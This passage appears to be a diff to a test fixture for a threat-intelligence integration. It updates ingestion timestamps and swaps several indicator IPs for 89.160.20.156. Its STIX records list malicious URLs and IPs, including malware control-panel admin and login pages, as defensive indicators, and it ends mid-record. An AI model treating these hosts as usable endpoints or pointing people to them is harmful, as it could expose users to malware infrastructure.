"original": "{\"created\":\"2020-02-20T04:32:52.074Z\",\"description\":\"TS ID: 55321824417; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--f4447d70-3217-4319-9b89-4439db608f67\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-20T04:32:52.074Z\",\"name\":\"mal_url: http://ld01c555.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld01c555.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:32:52.074Z\"}", "category": "threat", "type": "indicator", 
@@ -22878,7 +22878,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388167691Z", + "ingested": "2021-12-13T08:38:40.025426600Z", "original": "{\"created\":\"2020-02-20T04:49:13.452Z\",\"description\":\"TS ID: 55324942456; iType: mal_url; State: active; Org: Shinjiru Technology Sdn Bhd; Source: CyberCrime\",\"id\":\"indicator--93e03851-428e-4e25-9fa6-17383426a6d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T04:49:13.452Z\",\"name\":\"mal_url: http://borrdrillling.com/psm91/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://borrdrillling.com/psm91/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:13.452Z\"}", "category": "threat", "type": "indicator", @@ -22929,7 +22929,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388172159Z", + "ingested": "2021-12-13T08:38:40.025433900Z", "original": "{\"created\":\"2020-02-20T04:49:22.233Z\",\"description\":\"TS ID: 55324942451; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--ddce3ac3-2e92-4c94-9537-acefcbfecfc0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:49:22.233Z\",\"name\":\"mal_url: http://wtfshop.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wtfshop.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:49:22.233Z\"}", "category": "threat", "type": "indicator", 
@@ -22980,7 +22980,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388176617Z", + "ingested": "2021-12-13T08:38:40.025441Z", "original": "{\"created\":\"2020-02-20T04:50:21.678Z\",\"description\":\"TS ID: 55324942453; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d4e1621e-ff57-4881-bf03-67f89c1db651\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-20T04:50:21.678Z\",\"name\":\"mal_url: http://minecrafttusa1.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://minecrafttusa1.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.678Z\"}", "category": "threat", "type": "indicator", @@ -22999,7 +22999,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 141.8.194.74", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", "modified": "2020-02-20T04:50:21.708Z", "valid_from": "2020-02-20T04:50:21.708Z", 
@@ -23021,12 +23021,12 @@ "first_seen": "2020-02-20T04:50:21.708Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "141.8.194.74" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388180926Z", - "original": "{\"created\":\"2020-02-20T04:50:21.708Z\",\"description\":\"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-20T04:50:21.708Z\",\"name\":\"mal_ip: 141.8.194.74\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '141.8.194.74']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.708Z\"}", + "ingested": "2021-12-13T08:38:40.025448100Z", + "original": "{\"created\":\"2020-02-20T04:50:21.708Z\",\"description\":\"TS ID: 55324942431; iType: mal_ip; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--99db47e4-6284-47db-a3bb-70dfcac899c2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-20T04:50:21.708Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:21.708Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -23044,7 +23044,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.252.11.134", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime", "modified": "2020-02-20T04:50:33.473Z", "valid_from": "2020-02-20T04:50:33.473Z", 
@@ -23066,12 +23066,12 @@ "first_seen": "2020-02-20T04:50:33.473Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.252.11.134" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388185344Z", - "original": "{\"created\":\"2020-02-20T04:50:33.473Z\",\"description\":\"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-02-20T04:50:33.473Z\",\"name\":\"mal_ip: 47.252.11.134\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.252.11.134']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:33.473Z\"}", + "ingested": "2021-12-13T08:38:40.025455200Z", + "original": "{\"created\":\"2020-02-20T04:50:33.473Z\",\"description\":\"TS ID: 55324942449; iType: mal_ip; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--75f014d9-2c40-4fa1-a05e-43521af4a944\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-36\"],\"modified\":\"2020-02-20T04:50:33.473Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:50:33.473Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23121,7 +23121,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388189592Z", + "ingested": "2021-12-13T08:38:40.025459200Z", "original": "{\"created\":\"2020-02-20T04:51:08.292Z\",\"description\":\"TS ID: 55324942438; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e5ae9133-c459-4130-b2cc-6bfc3d1bba08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-20T04:51:08.292Z\",\"name\":\"mal_url: http://amazon-fr.fun/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amazon-fr.fun/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T04:51:08.292Z\"}", "category": "threat", "type": "indicator", @@ -23140,7 +23140,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.8.88.68/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-20T05:16:07.933Z", "valid_from": "2020-02-20T05:16:07.933Z", 
@@ -23164,16 +23164,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://5.8.88.68/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "5.8.88.68", - "full": "http://5.8.88.68/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388194020Z", - "original": "{\"created\":\"2020-02-20T05:16:07.933Z\",\"description\":\"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T05:16:07.933Z\",\"name\":\"mal_url: http://5.8.88.68/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.8.88.68/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:07.933Z\"}", + "ingested": "2021-12-13T08:38:40.025464400Z", + "original": "{\"created\":\"2020-02-20T05:16:07.933Z\",\"description\":\"TS ID: 55328307473; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--19914258-5bed-4f35-8f57-f639b0d9c1a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-70\"],\"modified\":\"2020-02-20T05:16:07.933Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:07.933Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23223,7 +23223,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388198178Z", + "ingested": "2021-12-13T08:38:40.025469900Z", "original": "{\"created\":\"2020-02-20T05:16:27.52Z\",\"description\":\"TS ID: 55330801573; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--a1d0cc69-641e-4588-92f4-0ad9713860e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-20T05:16:27.52Z\",\"name\":\"mal_url: http://f0400017.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0400017.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.52Z\"}", "category": "threat", "type": "indicator", @@ -23274,7 +23274,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388202516Z", + "ingested": "2021-12-13T08:38:40.025474900Z", "original": "{\"created\":\"2020-02-20T05:16:27.557Z\",\"description\":\"TS ID: 55330801572; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--52371067-94be-4a79-b45d-8de115e81e86\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-20T05:16:27.557Z\",\"name\":\"mal_url: http://f0391202.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391202.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:27.557Z\"}", "category": "threat", "type": "indicator", 
@@ -23325,7 +23325,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388206744Z", + "ingested": "2021-12-13T08:38:40.025478800Z", "original": "{\"created\":\"2020-02-20T05:16:37.354Z\",\"description\":\"TS ID: 55328307469; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--0e0682f9-a160-46c2-ba7f-ba9dc2858f7e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:16:37.354Z\",\"name\":\"mal_url: http://ld7fa9c9.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ld7fa9c9.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:37.354Z\"}", "category": "threat", "type": "indicator", @@ -23344,7 +23344,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 161.117.178.167", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime", "modified": "2020-02-20T05:16:41.613Z", "valid_from": "2020-02-20T05:16:41.613Z", 
@@ -23366,12 +23366,12 @@ "first_seen": "2020-02-20T05:16:41.613Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "161.117.178.167" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388211553Z", - "original": "{\"created\":\"2020-02-20T05:16:41.613Z\",\"description\":\"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:16:41.613Z\",\"name\":\"mal_ip: 161.117.178.167\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '161.117.178.167']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:41.613Z\"}", + "ingested": "2021-12-13T08:38:40.025483900Z", + "original": "{\"created\":\"2020-02-20T05:16:41.613Z\",\"description\":\"TS ID: 55330801557; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--c7e63dd5-c41f-4fd4-bbaa-8b54a1a1a227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-02-20T05:16:41.613Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:41.613Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23422,7 +23422,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388215971Z", + "ingested": "2021-12-13T08:38:40.025491300Z", "original": "{\"created\":\"2020-02-20T05:16:57.739Z\",\"description\":\"TS ID: 55328307494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--9f847df6-9c88-4a03-b852-394fd8a77f58\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-20T05:16:57.739Z\",\"name\":\"mal_url: http://referral-casino.club/1/stats/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://referral-casino.club/1/stats/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.739Z\"}", "category": "threat", "type": "indicator", @@ -23474,7 +23474,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388220149Z", + "ingested": "2021-12-13T08:38:40.025495600Z", "original": "{\"created\":\"2020-02-20T05:16:57.764Z\",\"description\":\"TS ID: 55328307481; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--479ea508-2ae1-4aea-825b-e83914fb8d53\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:16:57.764Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work5/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.764Z\"}", "category": "threat", "type": "indicator", 
@@ -23526,7 +23526,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388224668Z", + "ingested": "2021-12-13T08:38:40.025500200Z", "original": "{\"created\":\"2020-02-20T05:16:57.791Z\",\"description\":\"TS ID: 55328307476; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--051488db-6441-4ca9-9e5f-c8656e3b1d9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-20T05:16:57.791Z\",\"name\":\"mal_url: http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.ki/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:16:57.791Z\"}", "category": "threat", "type": "indicator", @@ -23545,7 +23545,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.98.87.59", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime", "modified": "2020-02-20T05:17:10.129Z", "valid_from": "2020-02-20T05:17:10.129Z", 
@@ -23567,12 +23567,12 @@ "first_seen": "2020-02-20T05:17:10.129Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.98.87.59" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388229266Z", - "original": "{\"created\":\"2020-02-20T05:17:10.129Z\",\"description\":\"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-20T05:17:10.129Z\",\"name\":\"mal_ip: 185.98.87.59\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.98.87.59']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:17:10.129Z\"}", + "ingested": "2021-12-13T08:38:40.025503700Z", + "original": "{\"created\":\"2020-02-20T05:17:10.129Z\",\"description\":\"TS ID: 55328307464; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--d5a928aa-3237-4c44-93e8-f73eb20dc728\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-20T05:17:10.129Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:17:10.129Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23623,7 +23623,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388233634Z", + "ingested": "2021-12-13T08:38:40.025509Z", "original": "{\"created\":\"2020-02-20T05:18:20.205Z\",\"description\":\"TS ID: 55330801629; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--db19cb4e-25ad-46d3-a944-6e53f62d230c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-20T05:18:20.205Z\",\"name\":\"mal_url: http://liweff.eu/vla/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/vla/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.205Z\"}", "category": "threat", "type": "indicator", @@ -23675,7 +23675,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388238233Z", + "ingested": "2021-12-13T08:38:40.025514700Z", "original": "{\"created\":\"2020-02-20T05:18:20.412Z\",\"description\":\"TS ID: 55328307485; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--438a519a-17ed-422b-a21d-0262b4b2fc0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:20.412Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:20.412Z\"}", "category": "threat", "type": "indicator", 
@@ -23727,7 +23727,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388242621Z", + "ingested": "2021-12-13T08:38:40.025521100Z", "original": "{\"created\":\"2020-02-20T05:18:22.703Z\",\"description\":\"TS ID: 55330801601; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7279d49d-39e4-42d1-8fb7-14ddb56d67d7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:22.703Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/lmark/pop/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/lmark/pop/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:22.703Z\"}", "category": "threat", "type": "indicator", @@ -23779,7 +23779,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388247020Z", + "ingested": "2021-12-13T08:38:40.025528400Z", "original": "{\"created\":\"2020-02-20T05:18:31.965Z\",\"description\":\"TS ID: 55328307489; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--70ae46d6-4f8c-4601-ac48-84848ca04719\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-20T05:18:31.965Z\",\"name\":\"mal_url: http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://158.69.39.138/file/panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.965Z\"}", "category": "threat", "type": "indicator", 
@@ -23831,7 +23831,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388251959Z", + "ingested": "2021-12-13T08:38:40.025535800Z", "original": "{\"created\":\"2020-02-20T05:18:31.986Z\",\"description\":\"TS ID: 55328307482; iType: mal_url; State: active; Org: YHC Corporation; Source: CyberCrime\",\"id\":\"indicator--11637bfb-fd5b-482b-83b0-ab8a49aa80e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-20T05:18:31.986Z\",\"name\":\"mal_url: http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://brokenhead.xyz/Work6/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:31.986Z\"}", "category": "threat", "type": "indicator", @@ -23883,7 +23883,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388257429Z", + "ingested": "2021-12-13T08:38:40.025543Z", "original": "{\"created\":\"2020-02-20T05:18:33.111Z\",\"description\":\"TS ID: 55330801593; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--b2cc241b-8f9a-494d-b842-74bc151bec7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-20T05:18:33.111Z\",\"name\":\"mal_url: http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxiii.xyz/DBY/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:33.111Z\"}", "category": "threat", "type": "indicator", 
@@ -23934,7 +23934,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388262749Z", + "ingested": "2021-12-13T08:38:40.025550100Z", "original": "{\"created\":\"2020-02-20T05:18:47.389Z\",\"description\":\"TS ID: 55330801620; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ac992a06-7013-4af2-b5c0-5c99f556d5b0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-20T05:18:47.389Z\",\"name\":\"mal_url: http://rds2020.space/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rds2020.space/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.389Z\"}", "category": "threat", "type": "indicator", @@ -23985,7 +23985,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388267678Z", + "ingested": "2021-12-13T08:38:40.025557400Z", "original": "{\"created\":\"2020-02-20T05:18:47.406Z\",\"description\":\"TS ID: 55330801615; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--d723c08e-997d-483e-91e0-2ba6048e3683\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-20T05:18:47.406Z\",\"name\":\"mal_url: http://vysyyvyvm.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vysyyvyvm.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.406Z\"}", "category": "threat", "type": "indicator", 
@@ -24037,7 +24037,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388272778Z", + "ingested": "2021-12-13T08:38:40.025564600Z", "original": "{\"created\":\"2020-02-20T05:18:47.424Z\",\"description\":\"TS ID: 55330801583; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--734a20dd-4f6e-4ca9-8eac-4cdd6b82a122\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-20T05:18:47.424Z\",\"name\":\"mal_url: http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://makadicuosde.cf/makave/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-20T05:18:47.424Z\"}", "category": "threat", "type": "indicator", @@ -24089,7 +24089,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388277928Z", + "ingested": "2021-12-13T08:38:40.025571700Z", "original": "{\"created\":\"2020-02-20T05:18:52.122Z\",\"description\":\"TS ID: 55328307475; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e4109b4c-b56f-4f16-818f-0db54e50f5e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-55\"],\"modified\":\"2020-02-20T05:18:52.122Z\",\"name\":\"mal_url: 